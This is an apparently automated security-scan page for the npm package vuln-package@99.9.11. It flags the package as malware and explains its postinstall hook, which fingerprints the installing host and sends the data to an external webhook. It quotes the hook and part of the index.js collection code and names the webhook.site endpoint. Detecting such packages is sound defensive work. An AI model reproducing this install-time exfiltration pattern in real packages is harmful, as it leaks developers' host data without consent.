registry  /  vuln-package  /  99.9.11

vuln-package@99.9.11

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Npm installation automatically executes `index.js`. It fingerprints the installing host and exfiltrates the data to an external webhook.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall
Impact
Leaks local username, hostname, and project/install working-directory information.
Mechanism
install-time host fingerprinting and HTTPS exfiltration
Attack narrative
On installation, npm invokes `node index.js` through the package's `postinstall` hook. The script reads the local account username, hostname, and `INIT_CWD` or current directory, serializes them into JSON, and sends them via HTTPS POST to a third-party webhook endpoint. This is unsolicited install-time environment fingerprinting and data exfiltration.
Rationale
Direct inspection confirms concrete, unsolicited install-time collection and external exfiltration with no package-aligned functionality. This meets the blocking threshold for malicious behavior.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/cde465c1-3853-40ea-880c-fdca6fe508cc

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines `postinstall: node index.js`.
  • `index.js` collects username, hostname, and install working directory.
  • `index.js` POSTs the collected host data to a third-party `webhook.site` URL.
  • The exfiltration runs automatically during npm installation, without user action or package functionality.
Evidence against
  • No additional package files or benign runtime functionality were present.
  • No credential-file reads, shell execution, or persistence beyond the install-time exfiltration were observed.
Behavioral surface
Source
EnvironmentVarsNetwork
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 642 B of source, external domains: webhook.site

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
1const os = require('os'); L2: const https = require('https'); L3: L4: const payload = JSON.stringify({ L5: user: os.userInfo().username, L6: cwd: process.env.INIT_CWD || process.cwd(), L7: hostname: os.hostname(), L8: // ip : localIP() ... L31: L32: req.write(payload); L33: req.end();
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1

Findings

2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowUrl Strings